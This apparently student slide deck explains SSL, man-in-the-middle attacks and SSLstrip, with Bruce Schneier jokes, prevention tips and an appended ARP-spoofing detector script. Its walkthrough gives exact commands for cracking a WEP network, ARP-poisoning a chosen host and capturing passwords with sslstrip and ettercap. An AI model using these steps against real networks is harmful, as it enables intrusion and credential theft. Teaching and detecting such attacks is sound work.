MITM - Man in the Middle

Upload: lucieliton-mundim

Post on 04-Apr-2018


  • 7/31/2019 mitm - Man in the Middle

    1/18

    Man-in-the-Middle Attack With SSL Strip

    Kyle Benson, Trevor Kiernan, Glen Saunders

    Bruce Schneier's earliest childhood memory is encrypted.


    What is SSL?

    • Secure Socket Layer
    • Predecessor to Transport Layer Security (TLS)
    • Establishes a secure connection between two computers
    • Important for banking sites and others
    • Authenticates: the server is actually who it says it is

    Bruce Schneier's p is irrational, and his q is imaginary.


    How Does it Work?

    • Runs on port 443 (not HTTP's port 80)
    • Client sends server hello and certificate
    • Server sends a signed certificate
    • Verified by Certificate Authority such as Verisign
    • Certificate used to encrypt data


    What is MITM?

    • Alice is trying to talk to Bob
    • Eve jumps in the middle
    • ARP spoofing (wireless)
    • Physical insertion (wired)
    • Eve tells Bob she is Alice and Alice that she is Bob

    Bruce Schneier killed Eve and Mallory with a birthday attack!


    What is MITM?

    • When Alice sends something to Eve (thinking she's Bob), Eve can read it
    • Eve forwards this information to Bob
    • Bob replies to Eve (thinking she's Alice)
    • Eve can read e-mail and intercept supposedly secure data (user names and passwords!)

    Bruce Schneier is always the Man in the Middle.


    What is ARP Spoofing?

    • ARP = Address Resolution Protocol
    • Alice sends ARP request (who is 192.168.1.1?)
    • Eve replies before the router can, so that Alice thinks Eve is the router
    • Now Alice's ARP cache is poisoned; she thinks Eve is the router
    • Eve forwards packets to her router


    What is SSLStrip?

    • Performs aforementioned MITM attack
    • Forwards all regular HTTP traffic
    • Changes Alice's HTTP request to HTTPS
    • Forwards this request via HTTPS to Bob
    • Explicit HTTPS request is sent a fake certificate signed by Eve
    • Replaces images with secure lock

    Bruce Schneier can draw a perfect circle with an Etch-a-Sketch.


    Capturing Information

    • Ettercap pulls passwords and user names for many different programs and protocols
    • Displays Bob's IP and URL
    • SSLStrip creates a log file

    Bruce Schneier can break elliptic curve cryptography by bending it to a circle.


    What we did

    1. Scan for networks
    2. Crack a network
    3. Connect to the cracked network
    4. Learn about a host on the network
    5. MITM on that Host
    6. Strip his/her SSL
    7. Scan for usernames and passwords
    8. Exit gracefully


    Scanning for Networks

    • airodump-ng wlan1

    Bruce Schneier can divide by zero.


    Crack it

    • airodump-ng -c 11 -w target_router wlan1 &
    • aireplay-ng -1 0 -e target_router -h [faked mac address] wlan1
    • after successful connection, aireplay-ng -3 -e target_router -h [faked mac] wlan1
    • let the data rate climb and aircrack-ng target_router-01.cap
    • Within 5 minutes you should have the WEP key. :-D


    Connect

    • Connect to the router with the card you just attacked with.
    • It should still have the same faked MAC address it was set to in the previous arp-replay attack
    • So now it's time for some recon

    The tattoos on Bruce Schneier's fists say "Alice" and "Bob". You don't want to make him exchange keys over your face.


    RECON

    • nmap -sP 192.168.1.0/28
    • This keeps the packet count lower and limits it to pinging
    • Find a host
    • We liked 192.168.1.2
    • Ran an OS fingerprint on it and checked which versions open ports were using
    • This generates a lot of traffic
    • This host looked good, and responded to our probes, so let's MITM.

    Bruce Schneier counts in binary. With his fists.


    RECON homing in

    Compilers don't warn Bruce Schneier, Bruce Schneier warns compilers.


    MITM

    • arpspoof -i wlan0 -t [their ip] [router ip]
    • arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1

    Bruce Schneier is always the Man in the Middle.


    SSL strip

    • sslstrip -a -k -f
      • -a : log all SSL traffic
      • -k : kill current sessions
      • -f : insert a lock icon in their connections

    Bruce Schneier's work isn't peer reviewed. He has no peers.


    Passwords from the stream

    • ettercap -T -q -i wlan0
      • -T : text only
      • -q : do not display packet contents
      • -i : interface to use
    • This will log traffic over our connection and filter the target's passwords, causing them to show in our window.
    • We can pipe this to a file as well.

    The set of Bruce Schneier's weaknesses is a mathematical constant. It is represented by the symbol .


    How to Prevent?

    • Secure your damn network! (WEP is NOT secure!)
    • Wireshark
    • ARP replies appearing very frequently
    • Invalid certificate error
    • Nmap scans
    • Don't accept certificates that aren't verified
    • Static ARP tables

    If Bruce Schneier wants your plaintext, he'll just squeeze it out of the ciphertext using his bare hands.
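
The "ARP replies appearing very frequently" check from the prevention slide, together with the cache poisoning described on the ARP spoofing slide, can be automated over a capture. The following is an added example, not part of the original slides; the log format, thresholds and MAC addresses are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample, loosely modelled on tcpdump's ARP reply text:
# "<epoch seconds> ARP, Reply <ip> is-at <mac>"
SAMPLE = """\
100.0 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55
130.0 ARP, Reply 192.168.1.7 is-at 00:11:22:33:44:77
160.0 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01
162.0 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01
164.0 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01
166.0 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01
168.0 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01
"""

LINE = re.compile(r"^(\d+(?:\.\d+)?) ARP, Reply (\S+) is-at ([0-9a-f:]{17})", re.I)

def parse(text):
    """Yield (timestamp, ip, mac) for every ARP reply line; skip anything else."""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            yield float(m.group(1)), m.group(2), m.group(3).lower()

def detect(text, window=10.0, max_replies=3):
    """Return (conflicts, floods).

    conflicts: {ip: sorted MACs} where one IP was claimed by several MACs.
    floods: set of (ip, mac) that sent more than max_replies replies
            inside any `window`-second span.
    """
    macs_for_ip = defaultdict(set)
    times = defaultdict(list)
    for ts, ip, mac in parse(text):
        macs_for_ip[ip].add(mac)
        times[(ip, mac)].append(ts)
    conflicts = {ip: sorted(m) for ip, m in macs_for_ip.items() if len(m) > 1}
    floods = set()
    for key, stamps in times.items():
        stamps.sort()
        # Sliding window: compare each reply with the one max_replies earlier.
        for i in range(max_replies, len(stamps)):
            if stamps[i] - stamps[i - max_replies] <= window:
                floods.add(key)
                break
    return conflicts, floods

if __name__ == "__main__":
    conflicts, floods = detect(SAMPLE)
    print("IP claimed by several MACs:", conflicts)
    print("Reply floods:", floods)
```
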